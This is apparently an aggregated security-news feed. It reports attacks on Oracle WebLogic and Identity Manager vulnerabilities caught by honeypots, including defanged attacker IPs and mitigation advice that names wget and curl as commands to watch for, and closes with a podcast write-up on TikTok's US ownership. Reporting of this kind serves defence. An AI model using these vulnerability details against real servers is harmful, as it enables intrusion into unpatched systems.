The post The $200 Billion Tether: Anthropic’s Massive Google Deal Exposes the “Circular Economy” of Silicon Valley AI appeared first on Daily CyberSecurity.

See what you missed in Daily Tech Insider from March 30–April 3.

The post AI Breakthroughs, Security Breaches, and Industry Shakeups Define the Week in Tech appeared first on TechRepublic.

The post Oracle Axes 30,000 Staff to Fuel a $10 Billion AI Gamble appeared first on Daily CyberSecurity.

A recent cybersecurity study reveals that threat actors are moving faster than ever to weaponize new software flaws.

According to data collected from a high-interaction honeypot, hackers are actively exploiting a newly disclosed, maximum-severity vulnerability in Oracle WebLogic Server.

The critical flaw, tracked as CVE-2026-21962, carries a CVSS score of 10.0. It allows unauthenticated attackers to execute arbitrary remote code (RCE) on vulnerable servers via the WebLogic Console.

Security researchers observed attack attempts immediately after the exploit code was published online on January 22, 2026.

This lightning-fast exploitation highlights the extreme risk posed to organizations running unpatched instances.

Honeypot Captures Automated Attacks

To understand the threat landscape, researchers deployed a high-interaction honeypot that mimics a vulnerable Oracle WebLogic Server (version 14.1.1.0.0) for 12 days.

The system quickly captured a massive surge in malicious traffic. Attackers primarily used rented Virtual Private Servers (VPS) from popular hosting providers, such as DigitalOcean and HOSTGLOBAL.PLUS, to launch high-volume, automated scans while hiding their true locations.

Instead of carefully targeted strikes, threat actors used a broad “spray and pray” approach.

Automated tools like libredtail-http (generating over 1,000 requests) and the Nmap Scripting Engine flooded the honeypot with malicious requests.

While the primary goal was compromising the new CVE-2026-21962 flaw via specific ProxyServlet HTTP GET requests, attackers also heavily tested the server for older, unpatched vulnerabilities.

The data confirms that cybercriminals do not just chase new zero-days; they also rely heavily on older, proven exploits.

Adapted for clear readability without complex data structures, the honeypot recorded steady attacks against several historical WebLogic vulnerabilities:

• CVE-2020-14882 and CVE-2020-14883: Critical RCE flaws (CVSS 9.8) targeting the administrative console by bypassing authentication.
• CVE-2020-2551: A severe deserialization vulnerability in the IIOP protocol that allows remote attackers to execute arbitrary code.
• CVE-2017-10271: An older but highly reliable XML deserialization flaw in the WLS-WSAT component, often exploited via crafted SOAP requests.

Interestingly, the automated scanners also identified completely unrelated vulnerabilities, such as bugs in Hikvision cameras and in PHPUnit, proving that attackers constantly cast a wide net, looking for any open door.

Mitigation Steps

The rapid weaponization of CVE-2026-21962 means organizations must act immediately to secure their networks.

According to CloudSEK, cybersecurity experts recommend the following critical defenses.:

• Apply Patches Immediately: Administrators must install the latest Oracle Critical Patch Updates (CPUs) across all components, prioritizing fixes for CVE-2026-21962.
• Restrict Console Access: The WebLogic administrative console should never be exposed directly to the public internet. Secure it behind a strict VPN or internal firewall.
• Deploy a Web Application Firewall (WAF): Configure WAF rules to detect and block malicious path traversal requests, Deep Packet Inspection (DPI) evasion attempts, and known exploit signatures.
• Monitor System Logs: Watch closely for unusual administrative access attempts or for the sudden execution of suspicious operating system commands such as wget or curl.

Leaving a WebLogic server exposed and unpatched is virtually guaranteed to result in a total system compromise.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Hackers Actively Exploiting Critical WebLogic RCE Vulnerabilities in Attacks appeared first on Cyber Security News.

What’s Affected: Products, Versions, and Risk 

• Oracle Identity Manager, versions 12.2.1.4.0 and 14.1.2.1.0
• Oracle Web Services Manager, versions 12.2.1.4.0 and 14.1.2.1.0

Patch Release and Support Guidance 

Exploitation in the Wild: What’s Known 

Wider Security Context 

Oracle fixed a critical severity flaw, tracked as CVE-2026-21992, enabling unauthenticated remote code execution in Identity Manager.

Oracle released security updates to address a critical vulnerability, tracked as CVE-2026-21992 (CVSS score of 9.8), affecting Identity Manager and Web Services Manager.

The flaw lets unauthenticated attackers over HTTP take control of Oracle Identity Manager and Web Services Manager, risking full system compromise with severe impact on data and availability.

“This Security Alert addresses vulnerability CVE-2026-21992 in Oracle Identity Manager and Oracle Web Services Manager. This vulnerability is remotely exploitable without authentication. If successfully exploited, this vulnerability may result in remote code execution.” reads the advisory.

“Oracle strongly recommends that customers apply the updates or mitigations provided by this Security Alert as soon as possible. Oracle always recommends that customers remain on actively-supported versions and apply all Security Alerts and Critical Patch Update security patches without delay.”

The issue is labeled as “easily exploitable.”

The vulnerability impacts Oracle Web Services Manager and Identity Manager versions 12.2.1.4.0 and 14.1.2.1.0.

Oracle did not reveal if the vulnerability was exploited in attacks in the wild.

In November 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Oracle Fusion Middleware flaw, tracked as CVE-2025-61757  (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog.

The vulnerability is a missing authentication for a critical function that can result in pre-authenticated remote code execution. The flaw is easily exploitable and allows an unauthenticated attacker with HTTP network access to compromise Identity Manager, enabling a full takeover of the system.

The flaw impacts versions 12.2.1.4.0 and 14.1.2.1.0. Oracle addressed the flaw with the release of Oracle Critical Patch Update Advisory – October 2025.

Adam Kues and Shubham Shah of Assetnote reported the vulnerability.

SANS researcher Johannes B. Ullrich recently reported that an analysis of his organization’s honeypot logs revealed multiple HTTP POST attempts between August 30 and September 9, 2025, targeting the Oracle Identity Manager endpoint associated with CVE-2025-61757. The scans originated from different IPs but used the same user agent, suggesting a single attacker. The 556-byte POST payloads indicate likely exploitation as a zero-day, weeks before Oracle released a patch. Attempts came from 89.238.132[.]76, 185.245.82[.]81, and 138.199.29[.]153.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Oracle Identity Manager)

TikTok has shifted to a majority-American entity, TikTok USDS Joint Venture, LLC, to comply with U.S. national security requirements and avoid a ban. This week we discuss why a recent privacy policy update went viral—especially language about sensitive data like immigration status and precise location—and argue much of it reflects longstanding practices and required California […]

The post TikTok’s New U.S. Deal and Privacy Policy: What Users Don’t Understand appeared first on Shared Security Podcast.

The post TikTok’s New U.S. Deal and Privacy Policy: What Users Don’t Understand appeared first on Security Boulevard.

This week on the Lock and Code podcast…

A funny thing happened on TikTok last month, and it has brought allegations of censorship, manipulation, and control.

It was the week of January 22, and after a long legal battle, TikTok had finally—for the first time in its company history—moved its ownership to new, American stewards. But with the American restructuring, TikTok users immediately reported that something had changed: videos would sometimes fail to record any views, and even direct messages would fail to send. But, according to user complaints, the flaws weren’t random. Instead, they befell users who spoke openly about topics that have become political lightning rods in the US, including Immigration and Customs Enforcement and the actions of sex offender Jeffrey Epstein.

To some aggrieved users, the flaws looked like censorship. But, according to TikTok, the error messages and missing video count tallies were part of a larger power outage.

“Since yesterday we’ve been working to restore our services following a power outage at a US data center impacting TikTok and other apps we operate,” TikTok wrote on the social media platform X (formerly Twitter). “We’re working with our data center partner to stabilize our service. We’re sorry for this disruption and hope to resolve it soon.”

While TikTok has reportedly more than 200 million users in the US alone, it’s far from a universal app. But the changes made to TikTok hint at a bigger sea change in social media and the internet today, in which online spaces are increasingly being altered, shut down, or even controlled—if not through government plot then certainly through corporate influence.

Oddly, the ownership change of TikTok was supposed to solve many of these problems.

Since TikTok’s 2017 founding in China, American lawmakers and government officials claimed that American users were vulnerable to Chinese surveillance. All the data that Americans hand over when using TikTok—their names and email addresses, but also their viewing habits, interests, behaviors, political inclinations, and approximate locations—all of that, the argument went, should not belong in the hands of a foreign power.

As FBI Director Christopher Wray said in 2022, the risk of TikTok was:

“The possibility that the Chinese government could use [TikTok] to control data collection on millions of users or control the recommendation algorithm, which could be used for influence operations.”

But the rocky start to the new American TikTok has only drawn renewed scrutiny: Have the past concerns about foreign manipulation now become current concerns about domestic manipulation?

Today on the Lock and Code podcast with host David Ruiz, we speak with Zach Hinkle, senior social media manager for Malwarebytes, and MinJi Pae, social media content creator for Malwarebytes, about what they personally experienced during TikTok’s transition to American owners, why the changes matter for the delivery of news and information, and how the internet appears to be shrinking from its earlier promises.

As Hinkle said on the podcast:

“ The idea of the internet being a private, free space that was ingrained in its creation, and every platform since then sort of carried that spirit with it… those spaces are disappearing.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.